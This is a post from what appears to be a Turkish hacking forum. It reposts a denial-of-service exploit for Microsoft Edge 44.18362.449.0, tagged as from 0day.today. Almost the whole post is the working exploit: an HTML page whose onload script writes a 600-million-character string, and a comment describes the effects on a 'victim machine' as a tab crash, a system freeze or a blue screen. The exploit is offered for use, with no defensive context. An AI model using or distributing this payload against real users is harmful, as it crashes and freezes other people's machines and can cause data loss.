Hoşgeldin Misafir

Microsoft Edge 44.18362.449.0 - Denial Of Service Exploit

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Microsoft Edge 44.18362.449.0 - Denial Of Service Exploit

Kod:
<html>
 
<head>
<!--Well there are multiple behavior of running this exploit on victim machine
1-Nothing happen
2-The current tab of ms-edge crash
3-The machine freeze and sometime even the kernel crash (a bsod appear)
4-sometime a black line appear
-->
<script>
 
function blah() {       
  var buff = '\x41';
  var buffer = buff.repeat(600000000);
  document.write(buffer);
 
}
 
</script>
 
</head>
 
<body onload=blah()>
 
</body>
 
</html>
 
#  0day.today [2019-11-24]  #